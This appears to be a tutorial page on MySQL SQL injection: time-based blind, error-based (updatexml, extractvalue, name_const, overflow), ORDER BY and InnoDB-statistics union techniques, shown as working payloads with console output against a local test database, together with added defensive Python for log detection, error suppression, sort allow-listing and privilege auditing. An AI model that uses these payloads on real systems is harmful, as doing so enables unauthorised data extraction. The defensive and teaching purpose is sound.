##### Time-based blind SQL injection
###### BENCHMARK(count,expr)
The benchmark function evaluates the expression expr count times; running expr as many times as possible is what produces the delay.
###### sleep(time)
###### Cartesian product
Joining several tables into a Cartesian product takes a long time, which produces the delay.
###### get_lock()
1. Open one session and take a lock on a key with get_lock (get_lock('a',5)).
2. Open a second session and call get_lock on the same key again: the call blocks for the time we specified. get_lock('a',5)
The two sessions are the essential part.
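From the defender's side, all four delay primitives above leave a recognisable shape in the query log, and a blind injection repeats that shape once per extracted character. The script below is an added example, not part of the original notes: it scans constructed MySQL general-log style lines (the sample data, the log line layout and the connection ids are assumptions) for sleep(), benchmark(), get_lock() and same-table comma joins with no join condition, then groups flagged statements by connection and literal-stripped template so the per-character probing pattern stands out.

```python
import re
from collections import Counter

# Constructed MySQL general-log style lines (sample data, not real traffic).
SAMPLE_LOG = """\
2024-05-01T10:00:01Z 12 Query select * from admin where id=1
2024-05-01T10:00:02Z 12 Query select * from admin where id=1 and if(substr((select database()),1,1)='c',sleep(4),1)
2024-05-01T10:00:07Z 12 Query select * from admin where id=1 and if(substr((select database()),2,1)='l',sleep(4),1)
2024-05-01T10:00:12Z 12 Query select * from admin where id=1 and if(substr((select database()),3,1)='a',sleep(4),1)
2024-05-01T10:00:15Z 13 Query select * from admin where id=1 and benchmark(50000000,md5('x'))
2024-05-01T10:00:16Z 14 Query select get_lock('a',5)
2024-05-01T10:00:17Z 15 Query select count(*) from information_schema.columns a, information_schema.columns b, information_schema.columns c
2024-05-01T10:00:20Z 16 Query select username from admin order by id
"""

# Assumed log line layout: timestamp, connection id, "Query", statement text.
LOG_LINE = re.compile(r"^(?P<ts>\S+)\s+(?P<conn>\d+)\s+Query\s+(?P<sql>.*)$")

# The three delay functions from the section above.
DELAY_PATTERNS = {
    "sleep": re.compile(r"\bsleep\s*\(", re.I),
    "benchmark": re.compile(r"\bbenchmark\s*\(", re.I),
    "get_lock": re.compile(r"\bget_lock\s*\(", re.I),
}
# The same table listed two or more times in a comma join with aliases and no
# join condition: the Cartesian-product delay.
CARTESIAN = re.compile(r"\bfrom\s+([\w.]+)\s+\w+(?:\s*,\s*\1\s+\w+)+", re.I)


def classify(sql):
    """Names of the delay primitives present in one statement (empty if none)."""
    hits = [name for name, pat in DELAY_PATTERNS.items() if pat.search(sql)]
    if CARTESIAN.search(sql):
        hits.append("cartesian_product")
    return hits


def normalize(sql):
    """Replace string and numeric literals so per-character probes share one template."""
    sql = re.sub(r"'[^']*'", "'?'", sql)
    return re.sub(r"\b\d+\b", "?", sql).lower()


def scan_log(text):
    """Return (connection id, primitives, sql) for every flagged statement."""
    findings = []
    for line in text.splitlines():
        m = LOG_LINE.match(line)
        if not m:
            continue
        hits = classify(m.group("sql"))
        if hits:
            findings.append((int(m.group("conn")), hits, m.group("sql")))
    return findings


def repeated_probe_templates(text, min_count=3):
    """Flagged statement templates seen at least min_count times on one connection.

    A blind injection extracts one character per request, so the same statement
    shape recurs with only the literals changing; that repetition is the strongest signal.
    """
    counts = Counter((conn, normalize(sql)) for conn, _, sql in scan_log(text))
    return {key: n for key, n in counts.items() if n >= min_count}


if __name__ == "__main__":
    for conn, hits, sql in scan_log(SAMPLE_LOG):
        print(f"conn {conn}: {','.join(hits)}: {sql[:70]}")
    for (conn, template), n in repeated_probe_templates(SAMPLE_LOG).items():
        print(f"conn {conn}: {n} probes sharing template {template[:60]}...")
```

Signature matching alone produces false positives (an ORM may legitimately call get_lock), which is why the repetition check is kept separate; in production the same grouping is better done on the application's own request log, where the client IP is available. Capping statement runtime with MySQL's max_execution_time (available from 5.7.8 for SELECT) limits how much delay any single probe can produce.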
##### Error-based injection
###### name_const
In MySQL a duplicate column name raises an error; name_const can be used to manufacture such a column.
One constraint: the value argument (the one that would hold version()) must be a constant, otherwise name_const itself raises an error.
We can use the duplicate-column error together with join to obtain column names.
using is equivalent to ON in a join.
```
mysql root@localhost:classmgr> select * from (select * from admin a join admin b)x;
(1060, u"Duplicate column name 'id'")
mysql root@localhost:classmgr> select * from (select * from admin a join admin b using(id))x;
(1060, u"Duplicate column name 'username'")
mysql root@localhost:classmgr> select * from (select * from admin a join admin b using(id,username))x;
(1060, u"Duplicate column name 'password'")
mysql root@localhost:classmgr> select * from (select * from admin a join admin b using(id,username,password))x;
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | CF60265A469500B5FF25CC10E4AB78D1 |
+----+----------+----------------------------------+
1 row in set
Time: 0.011s
```
###### XPath syntax errors
###### updatexml
If the XPath is not well-formed, MySQL raises a syntax error and echoes the XPath content; the error message starts at the first special character.
```
mysql root@localhost:classmgr> select updatexml(1,(select user()),1);
(1105, u"XPATH syntax error: '@localhost'")
mysql root@localhost:classmgr> select user();
+----------------+
| user()         |
+----------------+
| root@localhost |
+----------------+
1 row in set
Time: 0.013s
mysql root@localhost:classmgr>
```
So we wrap the value with a string function (concat) to put a special character in front of it:
```
mysql root@localhost:classmgr> select updatexml(1,concat('~',(select user()),'~'),1);
(1105, u"XPATH syntax error: '~root@localhost~'")
mysql root@localhost:classmgr>
```
extractvalue raises its error on the same principle as above.
```
mysql root@localhost:classmgr> select extractvalue(1,concat('~',(select user())));
(1105, u"XPATH syntax error: '~root@localhost'")
```
##### Integer overflow
###### ~0, pow(), cot(), exp()
Bitwise-negating 0 gives the largest BIGINT UNSIGNED value; doing arithmetic on it overflows and raises a BIGINT error.
```
mysql root@localhost:classmgr> select ~0
+----------------------+
| ~0                   |
+----------------------+
| 18446744073709551615 |
+----------------------+
1 row in set
Time: 0.010s
mysql root@localhost:classmgr> select 1+~0
(1690, u"BIGINT UNSIGNED value is out of range in '(1 + ~(0))'")
mysql root@localhost:classmgr> select 1-~0
(1690, u"BIGINT UNSIGNED value is out of range in '(1 - ~(0))'")
```
For use in injection: as we know, when a subquery returns successfully its value (as a number) is 0, so applying logical NOT to it gives 1.
```
mysql root@localhost:classmgr> select !(select user())x;
+---+
| x |
+---+
| 1 |
+---+
1 row in set
Time: 0.364s
mysql root@localhost:classmgr>
```
It is probably a MySQL version issue, but the data-extraction method described online did not work for me.
##### Geometric function errors
Error-based injection with geometric functions such as polygon() and linestring(); the data-extraction method described online did not work.
```
mysql root@localhost:classmgr> select * from admin where id=1 and polygon(id);
(1367, u"Illegal non geometric '`classmgr`.`admin`.`id`' value found during parsing")
mysql root@localhost:classmgr> select * from admin where id=1 and linestring(id);
(1367, u"Illegal non geometric '`classmgr`.`admin`.`id`' value found during parsing")
```
##### Injection in insert, delete and update
```
mysql root@localhost:classmgr> insert into admin(id,username,password) values ('1' or updatexml(1,concat('~',(select database()),0x7e),1) or '','2');
(1105, u"XPATH syntax error: '~classmgr~'")
mysql root@localhost:classmgr> update admin set username=1 where id=1 and updatexml(1,concat('~',(select user())),1);
(1105, u"XPATH syntax error: '~root@localhost'")
mysql root@localhost:classmgr>
mysql root@localhost:classmgr> delete from admin where id=1 and updatexml(1,concat('~',(select user())),1);
(1105, u"XPATH syntax error: '~root@localhost'")
```
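Every error-based technique in the sections above (name_const duplicate columns, updatexml/extractvalue XPath errors, BIGINT overflow, geometric functions, and the same tricks inside insert/update/delete) only yields data if the application copies the database's error text into its response. The following is an added example, not code from the original notes: a query wrapper that returns a generic message to the caller, logs the raw error server-side, and tags it with the signatures seen in the transcripts so incident response can pick them out. The DatabaseError class and fake_execute are constructed stand-ins for a real driver's exception and cursor; the error numbers and messages they reproduce are the ones shown on this page.

```python
import logging
import re

logger = logging.getLogger("dbguard")

# Signatures of the error-based techniques shown above: (label, MySQL errno, message pattern).
ERROR_SIGNATURES = [
    ("xpath_error_injection", 1105, re.compile(r"XPATH syntax error", re.I)),
    ("duplicate_column_probe", 1060, re.compile(r"Duplicate column name", re.I)),
    ("bigint_overflow_probe", 1690, re.compile(r"BIGINT UNSIGNED value is out of range", re.I)),
    ("geometric_function_probe", 1367, re.compile(r"Illegal non geometric", re.I)),
]

GENERIC_ERROR = {"error": "request failed"}


class DatabaseError(Exception):
    """Constructed stand-in for a driver exception carrying MySQL's (errno, message) pair."""

    def __init__(self, errno, message):
        super().__init__(message)
        self.errno, self.message = errno, message


def fake_execute(sql):
    """Constructed stand-in for a cursor: reproduces the error texts from the transcripts above."""
    lowered = sql.lower()
    if "updatexml(" in lowered or "extractvalue(" in lowered:
        raise DatabaseError(1105, "XPATH syntax error: '~root@localhost~'")
    if "1+~0" in lowered.replace(" ", ""):
        raise DatabaseError(1690, "BIGINT UNSIGNED value is out of range in '(1 + ~(0))'")
    if "polygon(" in lowered or "linestring(" in lowered:
        raise DatabaseError(1367, "Illegal non geometric '`classmgr`.`admin`.`id`' value found during parsing")
    return [(1, "admin")]  # constructed result row


def classify_db_error(errno, message):
    """Label a database error if its text matches a known error-based injection signature."""
    for label, _code, pattern in ERROR_SIGNATURES:
        if pattern.search(message):
            return label
    return None


def safe_execute(execute, sql, audit):
    """Run a statement; on failure the caller gets only a generic message.

    The raw MySQL text (including anything smuggled into an XPath string or an
    overflow expression) goes to the server log and the audit list, never to the
    response body, so the error channel carries no data back to the requester.
    """
    try:
        return {"rows": execute(sql)}
    except DatabaseError as e:
        label = classify_db_error(e.errno, e.message)
        logger.warning("db error %s (%s): %s", e.errno, label, e.message)
        audit.append({"errno": e.errno, "label": label, "raw": e.message})
        return GENERIC_ERROR


if __name__ == "__main__":
    audit_log = []
    print(safe_execute(fake_execute, "select updatexml(1,concat('~',(select user()),'~'),1)", audit_log))
    print(safe_execute(fake_execute, "select id, username from admin", audit_log))
    print(audit_log)
```

The generic message is deliberately identical for every failure class; a distinct message per error type would itself become an oracle. Matching on message text rather than errno matters for the XPath case, because 1105 is MySQL's generic "unknown error" code and is not specific to updatexml.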
Time-based blind injection in insert, update and delete works the same way.
##### order by injection
###### Boolean-based blind
rand(false) and rand(true) produce different displayed orderings.
###### Time-based blind
```
mysql root@localhost:classmgr> select * from admin order by 1 and if(substr((select database()),1,1)='c',sleep(4),1);
+----+----------+----------------------------------+
| id | username | password                         |
+----+----------+----------------------------------+
| 1  | admin    | CF60265A469500B5FF25CC10E4AB78D1 |
+----+----------+----------------------------------+
1 row in set
Time: 0.011s
```
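ORDER BY is the one place where a prepared statement does not help, because a column name is an identifier and cannot be bound as a parameter; the fix is an allow-list that maps client-supplied sort keys to fixed identifiers. This is an added example, not code from the original notes: it mirrors the admin table from the transcripts in an in-memory SQLite database (used here only because MySQL is not available offline; the table contents are constructed) and shows a sorted listing that rejects any sort parameter outside the allow-list, including the payload from the transcript above.

```python
import sqlite3

# Sort keys a client may send, mapped to the exact SQL identifiers used in the query.
SORT_COLUMNS = {"id": "id", "username": "username"}
SORT_DIRECTIONS = {"asc": "ASC", "desc": "DESC"}


def build_order_by(sort_key, direction="asc"):
    """Return a safe ORDER BY clause, or raise ValueError for anything outside the allow-list.

    Only values taken from the two dictionaries are ever interpolated, so client
    input never reaches the statement text, whatever it contains.
    """
    try:
        column = SORT_COLUMNS[sort_key]
        order = SORT_DIRECTIONS[direction.lower()]
    except (KeyError, AttributeError):
        raise ValueError(f"unsupported sort parameter: {sort_key!r} {direction!r}") from None
    return f'ORDER BY "{column}" {order}'


def setup_demo_db():
    """In-memory table mirroring the admin table in the transcripts (constructed rows)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE admin (id INTEGER, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO admin VALUES (?, ?, ?)",
        [(1, "admin", "<hash placeholder>"), (2, "bob", "<hash placeholder>")],
    )
    return conn


def list_admins(conn, sort_key="id", direction="asc"):
    """Sorted listing; the only string concatenated into the SQL is the allow-listed clause."""
    sql = "SELECT id, username FROM admin " + build_order_by(sort_key, direction)
    return conn.execute(sql).fetchall()


if __name__ == "__main__":
    db = setup_demo_db()
    print(list_admins(db, "username", "desc"))
    try:
        # The sort-parameter payload from the transcript above is rejected before any SQL runs.
        list_admins(db, "1 and if(substr((select database()),1,1)='c',sleep(4),1)")
    except ValueError as err:
        print("rejected:", err)
```

The same pattern covers the boolean variant (rand(true) versus rand(false)): a direction or expression that is not one of the two fixed strings is rejected, so the ordering of the result can no longer be made to depend on a condition chosen by the client.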
##### Injection through the MySQL InnoDB engine
When the InnoDB engine is enabled, it offers another injection path: in MySQL 5.6 and later the system database mysql contains two InnoDB-related tables, innodb_table_stats and innodb_index_stats. This of course requires root privileges.
```
mysql root@(none):CTFd> select * from runoob_tbl where runoob_id=1 union select group_concat(table_name),2,3,4 from mysql.innodb_index_stats where database_name=database();
+----------------------------------+--------------+---------------+-----------------+
| runoob_id                        | runoob_title | runoob_author | submission_date |
+----------------------------------+--------------+---------------+-----------------+
| 1                                | aa           | bb            | <null>          |
| runoob_tbl,runoob_tbl,runoob_tbl | 2            | 3             | 4               |
+----------------------------------+--------------+---------------+-----------------+
mysql root@(none):CTFd> select * from runoob_tbl where runoob_id=1 union select group_concat(database_name),2,3,4 from mysql.innodb_index_stats
+----------------------------------------+--------------+---------------+-----------------+
| runoob_id                              | runoob_title | runoob_author | submission_date |
+----------------------------------------+--------------+---------------+-----------------+
| 1                                      | aa           | bb            | <null>          |
| CTFd,CTFd,CTFd,mysql,mysql,mysql,mysql | 2            | 3             | 4               |
+----------------------------------------+--------------+---------------+-----------------+
2 rows in set
Time: 0.012s
```
Querying innodb_table_stats works as well.
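The precondition stated above, that reading mysql.innodb_index_stats needs root-level privileges, is the mitigation: an application account should hold privileges on its own schema only, never on *.* or mysql.*. The script below is an added example, not from the original notes: it parses SHOW GRANTS output (the three accounts and their grant lines are constructed sample data) and reports any grant that would let a compromised application account reach the InnoDB statistics tables or carry server-wide privileges.

```python
import re

# Constructed SHOW GRANTS output for three accounts (sample data, not from a real server).
SAMPLE_GRANTS = {
    "app@%": [
        "GRANT USAGE ON *.* TO 'app'@'%'",
        "GRANT SELECT, INSERT, UPDATE ON `CTFd`.* TO 'app'@'%'",
    ],
    "root@localhost": [
        "GRANT ALL PRIVILEGES ON *.* TO 'root'@'localhost' WITH GRANT OPTION",
    ],
    "report@%": [
        "GRANT SELECT ON `mysql`.* TO 'report'@'%'",
        "GRANT SELECT ON `CTFd`.* TO 'report'@'%'",
    ],
}

GRANT_RE = re.compile(r"^GRANT\s+(?P<privs>.+?)\s+ON\s+(?P<object>\S+)\s+TO\b", re.I)
# Privileges that let an account act far beyond its own schema.
HIGH_RISK_PRIVS = {"ALL PRIVILEGES", "ALL", "SUPER", "FILE", "PROCESS"}


def parse_grant(line):
    """Split one GRANT statement into (privilege set, object such as db.table)."""
    m = GRANT_RE.match(line)
    if not m:
        raise ValueError(f"not a GRANT statement: {line!r}")
    privs = {p.strip().upper() for p in m.group("privs").split(",")}
    obj = m.group("object").replace("`", "")
    return privs, obj


def audit_account(grants):
    """Reasons an account can read mysql.* statistics tables or holds server-wide privileges."""
    reasons = []
    for line in grants:
        privs, obj = parse_grant(line)
        if privs == {"USAGE"}:
            continue  # USAGE grants nothing; it only records that the account exists
        db = obj.split(".", 1)[0]
        if db == "*":
            reasons.append(f"global privileges {sorted(privs)} on *.* expose mysql.innodb_index_stats")
        elif db.lower() == "mysql":
            reasons.append(f"direct grant on mysql.* ({sorted(privs)}) exposes table and index statistics")
        risky = privs & HIGH_RISK_PRIVS
        if risky:
            reasons.append(f"high-risk privilege(s) {sorted(risky)} in {line!r}")
    return reasons


def audit_all(accounts):
    """Map each account name to its findings, keeping only accounts with at least one."""
    return {name: found for name, grants in accounts.items() if (found := audit_account(grants))}


if __name__ == "__main__":
    for name, found in audit_all(SAMPLE_GRANTS).items():
        print(name)
        for reason in found:
            print("  -", reason)
```

In the sample only the application account passes; the reporting account is flagged because a schema-scoped SELECT on mysql.* is enough to read both innodb_index_stats and innodb_table_stats, which is exactly what the union query above relies on.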
##### References
https://xz.aliyun.com/t/5505#toc-3